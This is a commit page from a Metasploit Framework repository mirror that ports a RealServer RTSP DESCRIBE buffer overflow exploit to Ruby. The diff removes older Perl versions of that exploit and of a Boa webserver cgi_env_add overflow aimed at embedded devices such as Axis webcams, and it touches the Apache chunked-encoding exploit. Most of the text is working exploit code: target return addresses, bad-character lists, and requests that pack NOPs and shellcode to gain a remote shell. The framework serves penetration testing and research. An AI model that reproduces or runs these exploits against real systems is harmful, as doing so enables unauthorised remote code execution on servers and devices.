dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

ported realserver describe exploit 

git-svn-id: file:///home/svn/framework3/trunk@4018 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Matt Miller 2006-10-11 09:18:01 +00:00
parent abf2e057c8
commit 7f981714a6
4 changed files with 83 additions and 456 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

256
dev/porting/queue/boa_cgi_env_add.rb
View File

@ -1,256 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'BOA cgi_env_add Overflow',
'Description' => %q{
This module exploits an undisclosed flaw in the Boa
webserver. The latest release branch is not vulnerable to
this flaw, however, there are a number of embedded devices
that still use this vulnerable version, such as Axis
webcams. This exploit is pretty unreliable due to the
unpredictability of certain variables that influence the
env_buffer's, such as PATH, hostname, and other such things.
},
'Author' => [ 'skape', 'thief <thief@hick.org>' ],
'Version' => '$Revision$',
'References' =>
[
],
'Privileged' => false,
'Payload' =>
{
'Space' => 140,
'BadChars' => "\x00\x0a\x0d",
'PrependEncoder' => "\x83\xec\x7f",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'linux',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => '',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::boa_cgi_env_add;
use strict;
use base "Msf::Exploit";
use Pex::Text;
my $advanced =
{
};
my $info =
{
'Name' => 'BOA cgi_env_add Overflow',
'Version' => '$Revision$',
'Authors' =>
[
'skape <mmiller [at] hick.org>',
'thief <thief [at] hick.org>'
],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits an undisclosed flaw in the Boa webserver. The latest
release branch is not vulnerable to this flaw, however, there are a number
of embedded devices that still use this vulnerable version, such as Axis webcams.
This exploit is pretty unreliable due to the unpredictability of certain variables
that influence the env_buffer's, such as PATH, hostname, and other such things.
}),
'Arch' => [ 'x86' ],
'OS' => [ 'linux' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [ 1, 'ADDR', 'The target proxy server address' ],
'RPORT' => [ 1, 'PORT', 'The target proxy server port' ],
'CGI' => [ 1, 'DATA', 'The CGI path to use', '/cgi-bin/io/virtualinput.cgi' ],
},
'Payload' =>
{
'Space' => 140,
'MaxNops' => 0,
'BadChars' => "\x00\x0a\x0d",
'Keys' => [ '+findsock' ],
'PrependEncoder' => "\x83\xec\x7f", # sub $0x7f, %esp
},
'Refs' =>
[
# 0day!
],
'Targets' =>
[
[ 'Boa/0.92o (Linux)', 0xbffffc30, 0xbffffba0 ],
[ 'Test', 0x41414141, 0x41414141 ],
],
'Keys' => [ 'boa' ],
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
sub Check
{
my $self = shift;
my $code = "Safe";
my $resp;
my $s;
$s = Msf::Socket::Tcp->new(
'PeerAddr' => $self->GetVar('RHOST'),
'PeerPort' => $self->GetVar('RPORT'),
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'));
if (not defined($s))
{
return $self->CheckCode('Connect');
}
$s->Send("HEAD / HTTP/1.0\r\n\r\n");
while (defined($resp = $s->Recv(-1, 5)))
{
my @lines = split /\n/, $resp;
foreach my $line (@lines)
{
my ($var, $val) = split /: /, $line;
$val =~ s/\r//;
$val =~ s/\n//;
if ($var eq 'Server')
{
$code = "Appears" if ($val eq 'Boa/0.92o');
}
}
last if ($resp =~ "\r\n\r\n" or length($resp) == 0);
}
$s->Close();
if ($code eq 'Appears')
{
$self->PrintLine("[*] This host appears to be vulnerable.");
}
else
{
$self->PrintLine("[*] This host does not appear to be vulnerable.");
}
return $self->CheckCode($code);
}
sub Exploit
{
my $self = shift;
my $targetIdx = $self->GetVar('TARGET');
my $payload = $self->GetVar('EncodedPayload');
my $shellcode = $payload->Payload;
my $randomText = undef;
my $request = undef;
my $target = $self->Targets->[$targetIdx];
my $chunk = undef;
my $final = undef;
my $null = $target->[2];
my $ret = $target->[1];
my $cgi = $self->GetVar('CGI');
my $pad = undef;
my $s = undef;
$self->PrintLine('[*] Trying exploit target: ' . $target->[0]);
# Build out the request
$randomText = Pex::Text::AlphaNumText(2039);
$pad = ($ret - $null - 0xb) - length($shellcode);
$chunk = "A" x 1858 . pack("V", $null - 0x74f);
$final = $self->MakeNops($pad) . $shellcode . pack("V", $ret - length($shellcode));
$request =
"GET $cgi HTTP/1.0\r\n" .
"01: $randomText\r\n" .
"02: $randomText\r\n" .
"03: $randomText\r\n" .
"04: $randomText\r\n" .
"05: $randomText\r\n" .
"06: $randomText\r\n" .
"07: $randomText\r\n" .
"08: $chunk\r\n" .
"OWNED: $final\r\n" .
"\r\n";
# Connect
$s = Msf::Socket::Tcp->new(
'PeerAddr' => $self->GetVar('RHOST'),
'PeerPort' => $self->GetVar('RPORT'),
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'));
if (not defined($s) or
$s->IsError)
{
$self->PrintLine('Error creating socket: '.$s->GetError);
return;
}
$s->Send($request);
$self->Handler($s) if (defined($s));
}
1;
=end
end
end

195
dev/porting/queue/realserver_describe_linux.rb
View File

@ -1,195 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'RealServer Describe Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in RealServer 7/8/9
and was based on Johnny Cyberpunk's THCrealbad exploit. This
code should reliably exploit Linux, BSD, and Windows-based
servers.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '4468'],
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
[ 'MIL', '51'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'linux, bsd, win32',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Dec 20 2002',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::realserver_describe_linux;
use base 'Msf::Exploit';
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'RealServer Describe Buffer Overflow',
'Version' => '$Revision$',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'linux', 'bsd', 'win32' ],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The RTSP port', 554],
},
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff :&?.=",
'Keys' => ['+findsock'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a buffer overflow in RealServer 7/8/9 and was based
on Johnny Cyberpunk's THCrealbad exploit. This code should reliably exploit
Linux, BSD, and Windows-based servers.
}),
'Refs' =>
[
['OSVDB', '4468'],
['URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
['MIL', '51'],
],
'DefaultTarget' => 0,
'Targets' => [['Universal Target']],
'Keys' => ['realserver'],
'DisclosureDate' => 'Dec 20 2002',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("OPTIONS / RTSP/1.0\r\n\r\n");
my $res = $s->Recv(-1, 5);
$s->Close();
if ($res =~ m/^Server:([^\n]+)/sm)
{
my $svr = $1;
$svr =~ s/(^\s+|\r|\s+$)//g;
$self->PrintLine("[*] $svr");
return $self->CheckCode('Detected');
}
return $self->CheckCode('Safe');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
$self->PrintLine("[*] RealServer universal exploit launched against $target_host");
$self->PrintLine("[*] Kill the master rmserver pid to prevent shell disconnect");
my $encoded;
foreach (split(//, $shellcode)){ $encoded .= sprintf("%%%.2x", ord($_)) }
my $req = "DESCRIBE /". ("../" x 560) . "\xcc\xcc\x90\x90". $encoded. ".smi RTSP/1.0\r\n\r\n";
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$s->Send($req);
$self->Handler($s);
return;
}
1;
=end
end
end

78
modules/exploits/multi/realserver/describe.rb Normal file
View File

@ -0,0 +1,78 @@
require 'msf/core'
require 'msf/core/exploit/http'
module Msf
class Exploits::Multi::Realserver::Describe < Msf::Exploit::Remote
include Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'RealServer Describe Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in RealServer 7/8/9
and was based on Johnny Cyberpunk's THCrealbad exploit. This
code should reliably exploit Linux, BSD, and Windows-based
servers.
},
'Author' => 'hdm',
'Version' => '$Revision: 3110 $',
'References' =>
[
[ 'OSVDB', '4468'],
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
[ 'MIL', '51'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d",
},
'Targets' =>
[
[
'Universal',
{
'Platform' => [ 'linux', 'bsd', 'win' ]
},
],
],
'DisclosureDate' => 'Dec 20 2002',
'DefaultTarget' => 0))
end
def check
response = request(
'method' => 'OPTIONS',
'proto' => 'RTSP/1.0',
'uri' => '/')
if response and response['Server']
print_status("Found RTSP: #{response['Server']}")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def exploit
print_status("RealServer universal exploit launched against #{rhost}")
print_status("Kill the master rmserver pid to prevent shell disconnect")
encoded = payload.encoded.gsub(/./) { |char| "%%%.2x" % char[0] }
request(
'method' => 'DESCRIBE',
'proto' => 'RTSP/1.0',
'uri' => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi")
handler
end
end
end

10
modules/exploits/windows/http/apache_chunked.rb
View File

@ -148,7 +148,7 @@ class Exploits::Windows::Http::ApacheChunkedEncoding < Msf::Exploit::Remote
end
def check
response = request(:uri => '/')
response = request('uri' => '/')
if response.nil?
print_status("No response to request")
@ -229,14 +229,14 @@ class Exploits::Windows::Http::ApacheChunkedEncoding < Msf::Exploit::Remote
# Build the request
request(
:uri => '/',
:headers =>
'uri' => '/',
'headers' =>
{
'Host' => "#{vhost}:#{rport}",
'Transfer-Encoding' => "CHUNKED"
},
:body => "FFFFFFF0 " + pattern,
:timeout => 2
'body' => "FFFFFFF0 " + pattern,
'timeout' => 2
)
# Check the handler